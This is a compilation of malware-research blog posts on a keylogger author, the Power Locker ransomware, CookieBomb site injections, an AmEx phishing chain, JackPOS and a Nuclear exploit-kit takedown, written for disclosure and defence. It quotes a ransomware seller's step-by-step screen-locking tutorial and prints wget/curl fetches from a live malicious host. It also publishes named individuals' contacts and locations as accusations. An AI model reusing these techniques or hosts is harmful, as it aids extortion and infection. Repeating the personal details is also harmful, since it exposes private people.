The message goes in pair with the account that promoting it. Below is the account that responsible for the threat (after while we also "suspect" that he's the coder) which is using the Skype ID of "allan.ridha" and living in Sweden: His confession of his own Skype ID is as per below: He is recently back to promote his malware keylogger (Shadow Logger): He confessed his own name here: *) Click the image above to be redirected to the forum's google cache URL to confirm.
Trails of IP address is showing where he is: (he confessed it himself with his photo :-) ) Tracked into Sweden..
Additionally he even made a TUTORIAL to build keylogger VB malware code in HIS youtube account-->>HERE The video in 4:23 contains his email address: allan.ridha@gmail.com PoC picture:
TO L.E.OFFICERS: URGENT: PLEASE DOWNLOAD THIS VIDEO BEFORE THE ACTOR ERASED IT FROM YOUTUBE!!
Following his M.O. in using SNS we can search his Facebook and Skype account easily too. Here's his facebook-->https://www.facebook.com/allan.ridha contains his pictures: In his facebook contents of timeline he is writing in swedish. so it's a proof supporting the fact that he's in Sweden. Another proof that is showing he is living in Sweden is the example of picture the demonstration picture he is using for his keylogger which leavingthe trails of language he's living: The account appeared in Skype Directory is showing same handle name used in promoting the Shadow Logger in some forums: Be free to check by yourself all of the fact above, and please don't tell us that he is innocent. Any effort to build a malware, even by SKIDS, has to be terminated as soon as possible, otherwise you won't know what he will sell and code when he is 40 year old. Please mark this bad actor and we hope this post is giving enough verdict to LE (Law enforcement), as coder and making effort to sell/promote keylogger malware, to open a legal case against him in LE side.
It'll generate this popup: And here is the full sysinternals record of processes executed by the sample and you can find some traces of the suspicious behaviors that usually spotted in capturing process -->>[PASTEBIN] Below is the stacks per modules loaded:
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094da8-30a0-11dd-817b-806d6172696f}\ New Value: [ Drive ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094daa-30a0-11dd-817b-806d6172696f}\ New Value: [ Drive ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Application Data ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Cookies ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ] HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run New Value: [ gens = C:\Documents and Settings\Administrator\Local Settings\Temp\breakfast.exe ]
I will update upon fixing my RAT, the data above are ones that I could recover so far. Be free to make your good analysis of this keylogger FUD. Mr. Marc Ochsenmeier (@ochsenmeier/twitter), the author of binary analysis PEStudio, was helping us in checking Shadow Logger (w/thank's) in PEStudio as per below tweets:
After digging a little further we "secured" the source code of this malware, this source code is passed to the AV industry, well-known malware researchers and law enforcement only.
Download -->>[HERE] Mirror Download -->>[HERE] read instruction in the video to unlock.
Malware bad actors just keep on coding and developing new threats with the stupid dream to get rich soon in their stupid heads. It's a serious moral corruption generated by whatever background they are raised, but that's a fact that is going on out there. Here is the case of those fact, but this one is escalated into quite harmful in threat level.. if released.. this will be more headache for researchers, industry and LEA (law enforcement agencies), so after internal meeting we decided to disclose it.
I suggest you pay attention for this disclosure. This post is a pure intelligence matter, we provided in comprehensive fact as evidence of crime, following by many of screenshots (with dates and some with URL) for your checking and comparison purpose.
As per previously post also mentioned, we (read: MalwareMustDie,NPO - Anti CyberCrime & Malware Research Group) work not only in defensive way but being active to spot the threat as early stage as possible, and inviting thus support law enforcement & CERT folks to initiate the crime case upon it.
Message to the Law Enforcement fellow is, all presented evidence in this post can be confirmed and checked by your side too, please don't let this malware spotted in the wild since judging by the current materials, boosted by some interest from the crooks that communicating each other in the bad bad forums, serious damage will be occurred for sure. The idea to verdict of coding malware and an attempt to sell it (by himself) as business scheme (see the panels part) is already a serious crime that can be used as a base to act.
Started from the hacker forums we spotted the release attempt messages below: Following by the next message: The better snapshot is below: Finally the public attraction in paste bin (click to link to the paste): This is where the name of Power Locker emerged.
The text of the "release note(? whatever they call it)" is interesting:
Hello everyone,
A while ago (when I first joined this forum) I made a thread about my Prison Locker malware I am developing for use. I would like to let everyone know about the substantial progress that has been made in its development. I will list new and existing features here. Uses 5+ anti VM and debugger methods to deter analysis. Encrypts all files (except for system files and .exe s) on hard drive(s) and shared drive(s) with AES encryption. Each file has its own AES key. Encrypts each AES key with RSA-2048, making the encryption practically uncrackable. Startup (obviously). Single file dropped and is put in hidden folder. Once files are encrypted, locker is spawned.
Features of locker module: Spawns a new desktop and displays window there. One thread checks to make sure user is in the right desktop every few miliseconds, if the user is in another desktop it is immediately switched back Windows and Escape key are disabled Multiple Window s processes (including regedit.exe, taskmgr.exe, cmd.exe, etc) are disabled, rendering Ctrl+Alt+Del useless Accepts BTC e-Vouchers, uKash, Paysafe (this list is not set, options can be changed) Payment codes entered undergo testing to make fake codes extremely hard to enter (this also is not set, I may chance how this work)
All that is left is the completion of the GUI (I have hired someone to do this, they are working right now). Once the GUI is completed, I just have to tie together some ends (linking the input of the GUI to my program to test payment codes is really only thing left). Also I will need to debug/test on multiple OS s/fix any final issues.
This is a major improvement from my previous features, as encryption makes the bot much more valuable. Even if the user is able to somehow get out of locker screen, files will still be encrypted with practically unbreakable encryption. It has been shown that cryptolockers are very successful because without paying, the user has no chance of recovering files (so paying is in their best interest). I have a list of 3 people who have already expressed interest in the locker, and they along with another 2 people (so the first 5, of which 3 are already filled) will receive a bin at a discounted price of $50. The regular price will be $100. If you would like to express interest in buying, please either PM me or contact my jabber: gyx@jodo.im . Messaging me on Jabber will get a response much quicker (I have other forums to pay attention to than HF obviously). I will update this thread with developments in the future. S/O to betamonkey who I respect very much.
And has good responses from fellow crooks :-)
And in another forum also started some post of tutorials/manual: For all good people's conveniences, the text grabbed:
As my first tutorial here I would like to bring something I think that a lot of people can benefit from and may enjoy learning about. I will be providing a tutorial on how to lock a window in place using some basic methods, I have chosen this because I am in the final stages of developing a crypto locker which locks a window in place along with encrypting files. If you are interested in buying message me on jabber: gyx@jodo.im. Anyways, we will be using a couple of methods to lock our window in place. Keep in mind that all of this is being done from userland.
1. Disable a couple of important keys using a very simple SetWindowsHookEx.
Please Login or Register to see this Hidden Content
As you can probably tell by reading the functions, we disable both the right and left windows key, along with the escape key. This prevents the user from pressing the windows key to bring up the start menu (this actually doesnt matter, as we kill explorer.exe later anyways), or using the escape key. This is _not_ one of the most important parts of our locking code.
2. This next part is extremely handy, and BTW hooking the keys should be done after this next step or else it may not work properly. Basically, we will be creating a new desktop using the API CreateDesktop and then we will dedicate a thread to making sure we are in this desktop. By switching desktops we set up a fresh environment to work in with no other processes (other than those that Windows is always running of course). So Alt+Tab is of no use (this is used to toggle through open applications). The code for this is quite simple, and consists of two parts. The first is putting us in the right desktop if we are not there, and the second is running a thread to maintain this position. Here is some code:
Please Login or Register to see this Hidden Content
So we are first checking to make sure we are not for some odd reason already in our desktop, and then creating a desktop to switch to. We switch to it, and then start our thread to stay there. The thread simply checks every few miliseconds to see what desktop we are in, and switches to our "lockerdesktop" if we are not there. Very useful part.
3. I wont share the exact code for the next method because it takes up quite a bit of room and is pretty simple. But I will provide step by step instructions on what needs to be done. Basically we will be closing explorer.exe (to close the dock mostly) and then checking for and terminating taskmgr.exe, cmd.exe, regedit.exe, and any others of your choice. The function that will be a thread should:
Close explorer.exe using the command "taskkill /IM explorer.exe /F" using whatever API of your choice to execute a Windows command. Enter a while(1) loop with maybe a Sleep(15) at the beginning. The loop should do the following over and over: Enumerate all processes open (this is computationally heavy thats why I recommend a Sleep(15)), google how to do this if you dont know how ;) Get the name of each process by using a simple for loop after opening the process (you should find some code if you google, hint: GetModuleBaseName for getting the process name). Compare the name to your list of applications to kill (strcmp(), it returns 0 if they are identical), and execute the following command if they are identical: "taskkill /IM processname.exe /F". You cant close a Windows process such as taskmgr using a normal API call or even a normal taskkill /IM call, the easiest way to do this (that I have found) is using the taskkill command with /F (force) on there. You can again use whatever method for executing a Windows command that you choose, I use WinExec with the SW_HIDE parameter to prevent a cmd prompt from being displayed.
One thing I have noticed about this part is that you may need to play with the number of and locations of Sleep() commands, or else a bunch of cmd prompts may pop up over and over. Personal hint: split this up into two functions, one the enumerate all procs and one to get the name and terminate if it is on the list.
So in review, the sequence of steps for our basic locking mechanism should be:
Switch desktops and maintain our position there. Lock the keys. Kill explorer and moniter for our list of "bad" processes, kill them if they exist. Create our window to display, it should be fullscreen (you can find how to do this with a quick google). This can go anywhere after switching desktops really, doesnt matter too much.
Well thats all I plan to put in this tutorial as I dont want to give out all my methods or spoonfeed you. But I hope you enjoy this and learned a little something. :)
Back to top
And then also some Q & A comment from the coder: Another one: Oh BTW please don't tell us that this guy is innocent..
This is the pastebin link for the DOX info, shared in 24H only-->>[PASTEBIN] God bless the braves, thank you crusader!
Another attempt/vector for "other" threat post back then was also detected by the same bad actor: Well, it looks like he was investigating some flaw in browser too < to be noted by internet browser's vendors.
The identification
The ID is obvious. Which all are lead you to the bad actor's ID below: (picture?)
It wasn't that hard to confirm the bad actor's (the malware coder's) ID, our team filled Google with its cache now (hope is enough) for the PoC: Like this..) ..and this:
A bit shocky part is, "our suspect" was pretending (or) to be a researcher, see the ICQ number of the blog below for the comparison: Can you figure which account he is owning in twitter? :-) the #w00tw00t attack is the clue :D Following, the account he owned (twitter): This person has a lot to explain and look forward to hear it.Summarizing of information centred and linked from that ICQ number is: (picture?)
Tweet Analysis shows: OK, we leave it to the law enforcement to do the rest, but I suggest you all mark this IDs, friends. And I don't believe in coincidence. Additionally in the bottom of this post there is the ID of ICQ Account available-->>[LINK]
Commercial aspect of the malware - The panels
This is the panels screenshot promoted by the bad actor himself, these were two nice panels to be nuked down :-)
Obviously our crusader also spotted same threat too, I should notice this sooner :-)
All of the materials involved by this threat ail be shared offline to our partners & friends via secure vetted interface. Updates and mass investigation level is going to be released in our forum. Some data will be changed upon investigation progress.
(NEW) Recent Updates Information
1. We still monitor the case's progress and they realized that we extract the correct information. We also found that the plan to sell the malware (upon released) is still on schedule. Furthermore, the "marketer" actor of this malware product was responding to this blog disclosure as per pasted below: We urge law enforcement to start the investigation and all of the materials posted in this blog is formed to be used as crime evidence.
2. The closest information to the identification of the bad actor via public access is:
3. The marketer "Prophyry" (lives in Michigan, US) burped a doubtful information:
4. Clarification & Static Analysis of Sample 17FB3E3B3FD3CA7FB9E5F59BBF2CF234
A clarification
For the clarification of some dilemma that may occurred we added this section; We were not releasing information of the any sample or source codes we secured since there was no infection in the wild that can be described as the activity of malware infection, and there was NO RELEASE / FINAL version spotted at the time this blog's post was first written. What we spotted was the development effort and result of the software project that was designed to perform malicious ransom action by actors described in the above section in this post in details. As for the evidence we managed to secure some, and one of the sample was spotted in December 2013, with the hash of 17FB3E3B3FD3CA7FB9E5F59BBF2CF234, found & reported by our group's supporter during the surveillance session of this threat, further information can not be exposed due to the nature of security, intelligence and supporting to the work of our friends in law enforcement. Our disclosure is to draw attention of the law to make swift action accordingly in order the disrupt the bad actor's plan to release the product in time.
Since there is a progress in public that may doubt the dangerous facts of the threat, we are releasing the static binary analysis of sample 17FB3E3B3FD3CA7FB9E5F59BBF2CF234 mentioned above. I used to analyze the sample in almost every cases posted in this blog, but in this case, to make the pure objectivity of the analysis result, I invited the expert of static binary analysis, the author of Windows PE binary analysis tool "PeStudio", Mr. Marc Ochsenmeier from Germany, to investigate the binary with the static analysis. as per below details.
Static Analysis
The binary was statically analyzed, with the method as per quoted below: The goal of PeStudio is to detect anomalies, suspicious hints and other particularities of Windows Portable Executables and provide "Indicators" about the level of trust one can have about the image analyzed. The ultimate goal of PeStudio is to give a true/false about if an image is malware or not. The complete process is static. The image is never started. No attempt of any dynamic and/or runtime decryptor is made. No Reverse Engineering or code analysis is done. Report of Marc's static binary analysis in the PDF can be viewed here -->>[Report in PDF] Report Snapshot: (small size only)
Below are several screenshots of PeStudio tools GUI describing the malicious points explained in the report made by Marc, and if I may comment, PeStudio is a very useful tool (most of MalwareMustDie members are supporting the development and using it) to perform Windows PE static binary analysis, that can breakdown the details of the binary details to be easily reviewed and learned. A tool that I can recommend for malware research, here is the access-->>[HERE]
Malicious Sign Indicators:
Debug Information:
Imported Symbols:
Unclassified Strings:
By seeing thee above static analysis you maybe can tell whether the "sample" of PowerLocker is actually exist or not. The malware was not distributed widely because many of good people gather with us and making effort to interfere and disturb the bad actor's work, these gentlemen were actually spending their private time, taking many risk by doing hard work confronting the bad people while most of us were in New Year's holiday and celebrating.
We really hope that the coder and the marketer individuals who are supporting this malware's development can be stopped by law enforcement by an arrest, since we worry that they are still eager to release it as per planned.
My college in local security community visited and dare me to check on an obfuscation he can not judge what malicious category the case is. Since I am in the health treatment for a recovery and he is so nice to visit, so I accepted the challenge and helping him out with it, under condition to share this knowledge to the world :-)
The case is a local school's web site that is suffering by a malicious code injection. It looks like a CookieBomb case, and it has been a while that I didn't crack one of the recent codes. The case is interesting, you can fetch the sample before we clean it up by the below simple wget (read: do not use your browser) method:
The index.html on this site is obviously injected by the code below, right in the middle of the home page itself: By the traces of the format used I can guess automation injection tool was used.
It was not difficult to decode the garbled codes above (by using your favorite javascript deobfuscating flavor) to get the below redirection based on cookie-as-trigger concept (read: CookieBomb). Let's see the result below. I actually expect an IFRAME injection or similar redirection, instead we are seeing a full HTML page code of an injection (see the red color), with the link to 91.239.15.61/google.js (see another red color). You will see two parts of JS function (yellow color parts) which was meant to be used to read a cookie (if exists), or to make you have the cookie as a "ticket" to detonate "something bad" that will follow all these.
My tip for handling cookie bomb cases is, do not get too hasty on decoding, just see where the things are flowing first. Accordingly I just fetch the url written in the code, which having some ideas in my head, so let's see which idea is correct:
// fetching the h00p://91.239.15.61/google.js --2014-01-23 12:26:34-- h00p://91.239.15.61/google.js Connecting to 91.239.15.61:80... connected. : GET /google.js HTTP/1.1 Host: 91.239.15.61 HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 03:26:34 GMT Server: Apache/2.2.22 (Ubuntu) Last-Modified: Sat, 04 Jan 2014 20:39:44 GMT ETag: "60ffc-8da-4ef2b06d38400" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/javascript : 200 OK Length: 728 [application/javascript] Saving to: 'google.js' 100%[=========================>] 728 --.-K/s in 0s 2014-01-23 12:26:34 (13.4 MB/s) - 'google.js' saved [728/728]
Yes, I saved the file, and it contains another mistery as per snipped code below:
I don't like the dirty code, so let's beautify it here -->>[PASTEBIN] Following I will make explanation how to easy decoding this by using a notepad :-))
First, see the obfuscation data part is (as per below), all you must do is leave it as per it is, don't merge it, don't change anything, because instead of cracking the code.. your changes might destroy the obfuscation chain, and we really don't need to touch this part to solve this obfuscation:
You'll see also the three functions of getCookie, setCookie and checkCookie. The moronz behind this injection tools is making a useless effort by putting these functions to make us (read: good guys) wasting our time, so just ignore these functions too and let them be.
The part that you should pay attention is this part only: The red and orange marked parts are explaining a condition that should be passed (read: bypassed.) to detonate the decoding generator in line 174, well, to be specific the red part is obfuscating related condition and the orange one is a condition IF you have the desired cookie in your browser. So, by understanding this, you can detonate this CookieBomb by eliminating those two silly functions and go straight to the value generated by deobfuscation generator logic, as the I coded below, just run it :-) The URL that is being used to redirect the victim that is having a "ticket" (read: Cookie) for infection is marked in the red color.
Let's see IF the deobfuscation is correct, by accessing the URL..
Yep, the PHP is there alright. And..(why not?) try to trigger the "bomb" of this lame site w/the MMD's lame cookies ;-))
* About to connect() to 91.239.15.61 port 80 (#0) * Trying 91.239.15.61... * Adding handle: conn: 0x28894100 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToPipeline: length: 1 * - Conn 0 (0x28894100) send_pipe: 1, recv_pipe: 0 * Connected to 91.239.15.61 (91.239.15.61) port 80 (#0) > GET /g.php HTTP/1.1 > User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) > Host: 91.239.15.61 > Accept: */* > Referer: h00p://www.nose-highschool.ed.jp/ > Cookie: visited_uq=55;expires=Thu, 23 Jan 2014 14:40:07 GMT; path=/ > < HTTP/1.1 302 Found < Date: Thu, 23 Jan 2014 06:56:30 GMT * Server Apache/2.2.22 (Ubuntu) is not blacklisted < Server: Apache/2.2.22 (Ubuntu) < X-Powered-By: PHP/5.4.9-4ubuntu2.4 < Location: http://goo.gl/Yun4bN < Vary: Accept-Encoding < Content-Length: 0 < Content-Type: text/html; charset=UTF-8
Yes, both efforts above were 302 redirected to some sites that is having some possibilities of redirection (read: TDS), with noted the short url used. Meaning the CookieBomb PHP script (the server side) is there and serving.
The story is not end here, friends, you must feed the cookie request to this PHP file with the right parameter , use my previous writing here -->>[MMD Blog] and here -->>[MMD Blog] as guide to figure where this infection is heading :D - believe me, is not that difficult! And that is for you to dig further, since I have to rest, so good luck! :-)
The injected code is having redirection to this IP (which is being utilized for CookieBomb PHP scripts):
91.239.15.61
And the below URL are definitely bad:
91.239.15.61/g.php 91.239.15.61/google.js
And you can guess the location of this IP :-) The above information is the subject to clean up.
On the previous 1st part, I explained the first decoding of the new design in CookieBomb (version 2) threat with the easy decoding (read: "Detonating") for novices to get the quick URL redirection reference of the next infection. The access of the analysis is in here -->>[MMD-BLOG]
New Design of CookieBomb v2 in words..
The new design of the CookieBomb implemented two combination of cookie cushion, the first cushion of cookie forwarding condition and checking was performed and upon success the victim will be redirected to the NEXT cushion of cookie checking scheme: which is the well-known URL of [URL]/google.js in our caase. So in order to get the right path of infection on malware possibility researchers will need to have (read: to fool and fake) two cookies. We are going to discuss in this post in details. First Cushion of cookie condition (in javascript obfuscation ) is redirecting you to the remote Second Cushion of cookie condition (in javascript obfuscation), Each cusion has different condition check of cookies used and the Second Cushion of cookie (will be discussed below) is checking the REFERER of search engine list BEFORE redirecting you into the main TDS forwarder script (in this case is the file: g.php).
CookieBomb v2: Decoding & Analysis of Second Cushion
In this part I will decode the second cushion used by the CookieBomb injected code in some compromised sites that call to below URL:
91.239.15.61/google.js
First is the PoC of fetching the file:
--2014-01-30 02:43:56-- 91.239.15.61/google.js Connecting to 91.239.15.61:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2266 (2.2K) [application/javascript] Saving to: 'google.js' 100%[==========================>] 2,266 --.-K/s in 0s 2014-01-30 02:43:57 (36.3 MB/s) - 'google.js' saved [2266/2266]
And I re-pasting the obfuscation code below and the beautified code here-->>[PASTEBIN]
After our internal discussion with the MMD Germany decoder members (thank you for pointing out some unseen points), from the pattern of obfuscation seen, we came into conclusion of the usage of obfuscator tool(s) that had been used to encode the original code is like this one here --->>[LINK/GOOD SITE]
Moving along, after taking a look into the first obfuscation to find the hexadecimal sets that leads to ASCII characters, stored in the array of var _0xe2b8: In the picture above I marked the first 13 strings only (sorry, is just too many..and I was too tired), if you replace it you'll get the below arrays:
var _0xe2b8== ["referrer","google","yahoo","bing","yandex","baidu", "gigablast","soso","blekko","exalead","sogou","duckduckgo", "volunia","length","indexOf","location", "h00p://91.239.15.61/g.php","cookie","","=",";","substring","getDate","setDate","","; expires=","toUTCstring", "referrerRedirectCookie", "do not redirect";
Replacing these array into below obfuscation code:
And you will get the below result:
Which making some senses that the access for the google.js in effect is needed a REFERER (point 1; noted, yes I know it misses an R), the var se means Search Engines..meanings the access that coming from this will be fit to the next process (point 2), and also (see point 3) the redirection access using javascript on window object with changing the location method.
"The Cookie scheme" of 2nd Cushion Parts
The set of cookie operation functions started from the grabbing logic of the cookie as per the decoded code below (the variable name was adjusted): As you can see, the checks runs to some possibilities that cookie data was stored by the browsers and the grabbed data is stored in var c_value.
And it will be followed by calling the checking procedure of the cookies as per below code: Noted that "Go" and "No go" flag is stated on "true" and "false" result on this function.. If the result is "false" then you can't go to the stated redirection, and the cookie for you to visit next time to be redirected will be made for you via the code below:
Debug the CookieBomb v2
Our team was testing the flow by the debugger to simulate some possibilities covered by this 2nd part of Cookie logic:
And it runs as per described in the log above if you don't have the ticket for infection (read: necessary cookies).
CookieBomb v2: Google.JS (2nd Cushion) in Graph
To make things easier to understand for the second cushion cookie check scheme in CookieBomb v2, I made the simple graph as per below, sorry for some note in JP that I made:
Regarding to the 91.239.15.61/g.php TDS redirector, it has the redirection function, and so far, as per posted in Part 1, still go to parking domain site. We are searching the server side code of this threat now, if you happen to see and can access the infected sites contains the file of (or like) g.php mentioned in this post, please ping me in the comment part.
How bad the infection so far?
is very very BAD!!!, attacking all over the web..
Epilogue
Hope this writing helping in understanding the evolution of the CookieBomb threat, blocking for the next URL/IP AFTER being redirected from CookieBomb first cushion will be a very good idea.
As you may know, MMD blog is focusing on malware/botnet related threat. But today I want to make an exception, my SMTP Honeypot is full with the American Express phishing scam emails so I dare my self to write my "experience" about this phishing matter. Is not a thorough analysis, so please bear with some lack of information in the post.
On the other hand, I captured everything. For the law enforcement and threat researcher's investigation convenience I attached the PCAP & all captured data grabbed from the session, please feel free to use and analyze it deeper. The point of this public post is to raise awareness of this phishing attempt since some people I know got hit by this scam. Here we go:
It was all started from a phishing email: I phishing, the url is important, see the above trick of redirector URL in the email. And URLquery is having records on OTHERS URL too, see below check requests: ↑We can say that kaindustries.comcastbiz.net(216.87.186.70) is utilized by a phishing effort.
If you click any link in the email, you will get forwarded:
And ending up into the fake American Express site below: So this perfectbackstretch. com/americanexpress/ in 23.239.10.217 is the landing URL.
The route of the above redirections were generated as per below:
PoC of the forwarding routes in my Wireshark's capture in the Fiddler like setting :-)
For the old-schooler like me, just fire the marked conditions :-)
The scripts that trigger the redirection to the destination is in the URL written in the spam:
Which will call the destination coded in each javascript code in each JS file as per one sample below:
Additionally, I downloaded all HTML codes and run it locally to find a perfect match.. the whole code is meant to run in any remote side without much dependencies to its host/server..
Some suspicious points..
There are plenty of suspicious pouts, some javascripts to check and those are well made to conduct this phishing, again, please see the PCAP for more details on those. This phishing scheme is also using the GoDaddy's SSL service for the encryption, I am not so sure whether the real American Express site is using it too. BUT I want to point you to the correlation of remote sites access that has been spotted and recorded during following the phishing link. and I found it has two suspicious connections and each of those is really "interesting".
To be noted. I am not pointing finger to anyone, it might be there are also traps implemented by the phisher to disrupt the investigation, or maybe the AMEX itself is having these links/codes as default, I don't know 100% about that. So I will let the AmEx phishing experts to judge further, just read two points the explanation below and judge it by yourself, any opinions are welcome in the comment.
1. Cookie link (or callback?) ref to redirector kaindustries.comcastbiz.net on landing page..
.Well, we saw the page I snipped above, but behind the process there was an interesting call below: Yes, ok, it looks like checking a favicon and received 404, well nothing special.. but after some session on the phishing site executed further, the recorded PCAP below was requesting a similar but quite interesting packet: It has the cookie request. isn't it?..and it is coded w/URL encode, so..
I fond of cookie codes like this (recently, thx to CookieBomb crooks), and made it "beautiful" and.. There!.. A cookie to keep connection after login.. It explained the redirector sites and the access "ticket" to the phishing landing page..hmm..interesting.
So what's kaindustries.comcastbiz.net?
;; ANSWER SECTION: kaindustries.comcastbiz.net. 13597 IN A 216.87.186.70
The web site: Doesn't look strange so far..but why the phishing page URL is linked to this site? Answer: A compromised site. So what's with the "cookie" request with noticing source of infection? Well, this might be the phishing crook's way to know which malvertisement site/spam ticket that hits this site isn't it? The bad guys are quite persistent in tracking of which spam/redirector URL the request is coming.
Ah, yes. We reported this incident to the site's contact information:
2. An "abuse" request (to fake AmEx ticket?) to nexus.ensighten.com
There is also an interesting GET command to nexus.ensighten.com: If we beautify the GET URL format will look as per below: What was causing that GET request is the Bootstrap script below: A better view of the weird part is: So let's see if there any response from nexus.ensighten.com about this request: Is it a coincidence to link to nexus.ensighten.com and grabbing the phishing site's URL and send it? Is the real American Express site also link to it? I leave the answer to American Express Online folks.. If YES, then this is a merely abuse of the AmEx used API (assumed that nexus.ensighten.com is a legit API of AMEX, to fakes the appearance of the phishing page to look "more legitto fool the victims.
But if the answer is NO..this could be a potential phishing tracking scheme to know the traffic of the hits, we can imagine a scheme of money share is starting at this point between criminals involved, or maybe a panel in that site too?
for some checks. I requested the above JS get URL with the RuleID = 124663 and receiving the below code: And the second request of RuleID = 302786 to receive below response: Either these responses are coming from a legit AmEx Online's API that the phishing crooks abused or.. is a good fakes..
Anyway, the nexus.ensighten.com is in AWS: IS it normal?
And this is the page of nexus.ensighten.com: Is it normal?
It is out of my expertise. I will pass & leave it to the American Express security team, phishing researcher folks and law enforcement agencies in United States to dig further..
Prologue
Up to this This point I think I will leave the further investigation to the AMEX phishing experts. I share the my record data to be used for further investigation as per snipped picture below (click the picture to download) Please leave the comment with your contact information (email) for the password, I will not publish your comment that asking the passwords.
The URLquery for this phishing is--->>[HERE] It was taken in the same time as I checked, but URLQuery looks can not access the same result as mine, in my PC with JP IP I can access it.
Kudos our friend who noticing the same threat too :-)
@MalwareMustDie FYI this amex phish campaign is back today. E.g., hxxp://www[.]mossandlam[.]com/malfunctioning/index[.]html
As the credit for the current threat's awareness, a lot of you probably noticed the JackPOS malware's posted at: Xylit0l's post in Kernel Mode here -->>[kernelmode], in the IntelCrawler press release here -->>[IntelCrawler], and Josh Grunzweig's analysis on Trustwave Spiderlabs here -->>[LINK]
This post is an additional intelligence data supporting to the threat's technicalities written in the main investigation of the threat by the above mentioned gentlemen, it is our shares which may help law enforcement to aim better cannon directly to the bad actors (read: Moronz) who is actively in effort on selling and promoting the threat, the one behind the distribution of JackPOS malware scene.
As per always mentioned in previous posts, we (read: MMD / MalwareMustDie,NPO - Anti CyberCrime & Malware Research Group) work not only in defensive / mitigating way against the threat, but being proactive to spot the root of threat as early stage as possible, and inviting thus support law enforcement & CERT folks to initiate the crime case upon it.
DarkK0de (DK) Crook's Forum
This information was all compiled from our eyes in the DK forum. It was stated the promotion, the testing information, screenshot, latest specification of the JackPOS (furthermore I will refer it as "the product"), the screenshots and the contact information of the bad actor (read: moronz) behind it. I am sorry, after "internal discussion" it was decided not to paste DK forum screenshots itself, since that will raise the risk in blowing away our intelligence channel.
What we posted here may help to add more image & information of the "product" design of JackPOS, to the one that IntelCrawler, Xylit0l & Josh were working hard on analyzing it, in the following sections. To be noted, please understand, we are not adding more technicality details..but adding the campaign product design data, and also we are not aiming fame or riding on the flux of news for this threat. It's just that we did not see the right aim on clues of on-going investigation on the threat's source so far, so this is the share to lead law enforcement friends to aim closer to the target, the right "crook's forum" as the source of this malware campaign: "The DarkK0de".
And for you, the all malware crooks that I know that you're reading this post too, we want to let you know, MMD is different, WE BREATH BEHIND YOUR NECK! and we mean it, no matter how tight your "poor security" environment for a so-called a gathering buff (a.k.a. "forums"? ..whatever..) is. Just STOP NOW your malicious activity before is getting too late! Go and get a decent day work like all of us and live a decent life without fear. Consider this as a warning.
OK, the main course:
Screenshots
What DK was posting screenshots is as per it is:
Admin panel:
Dumps of CreditCard panel
The Bots Control Panel
Promotion Thread
Malware: (functions & specs)
- Coded in modern c++ - Size 145 kbytes (upx packed) - Small resource usage, ~90% of time 4 mbytes RAM and 0-2% cpu usage - Doesn‘t use regular expressions - Grabs track1/track2 - Update / Execute virus - Process persistence, if process closed, automatically will start again - Registry persistence, if registry key deleted or changed, it` restored - Very stable and well tested - Same track1/track2 won't be sent second time to panel (saved hashed of dumps in a file) - Once it founds processes with valid data, the virus scrap just them in - a loop of 100 times, then rescan all the processes till it finds productive ones. (Done in one thread for stability)
Product Updates:
The new version of virus have some new features that the old one doesn't:
- Support of Unicode dumps in processes - Much more stable - Improved panel (issues with archivation of dumps and bots), also changed exporting - Once it founds processes with valid data, the virus scrap just them in a loop of 100 times, then rescan all the processes till it finds productive ones. (Done in one thread for stability)
this Rome0 guy is a well know carder and scammer, with the below contacts (Kudos MMD DE team!)
ICQ 22222193 Jabber 22222193(at)jabber.cz
Prologue
The above information is enough to lead the law enforcement to perform the action to get the real actors ID behind the screen. It is reachable, and all we pass it to the justice. Herewith we are backing off on the investigation and intelligence of this case for the law to follow properly.
MalwareMustDie, NPO., is not owning any source code / samples / reversing data for this threat, we are posting this to support other entities mentioned above for this investigation exclusively, so please ask the mentioned front liner posters for the the further details.
To "some" fellow researchers: Don't mock for us taking down these bad domains. Think of the victims who get infected in hourly basis! Sorry if we blew your "tracking" objects away. Because of this takedown now the data behind these are ready to be used by the law enforcement to collect.
The background
Following the case on Nuclear Exploit Kit on malware infection via abuse of .PW 2LD domains (initially spotted : 31.41.221.131 to 31.41.221.139) - As the follow up due to the below malicious verdict of the researcher team & friends:
To be noted: We are not going to expose any technical evidence for this case in this post. And this post is focusing on the Tango Down effort initiated by the MalwareMustDie, NPO. The details of the Nuclear Pack itself is well-documented for the MMD friends in our public forum as information database of exploitation. (You have to be invited to be a member).
Spotting and following the movement of this threat from: 31 December 2013 until 13 February 2014. And witnessing the movement of the threat of the same group/actors: From OVH.COM (France) to: BESTHOSTING.UA (Kiev, Ukraine) at: AS 2655 ref-->>http://bgp.he.net/AS42655 Additional: BESTHOSTING.UA ref-->>https://www.besthosting.ua/en/
Additional information of the threat (to be added) - Thank you URLQuery!
We requested the suspension of the total 174 domains with the below stated breakdown, and the suspension was done successfully.
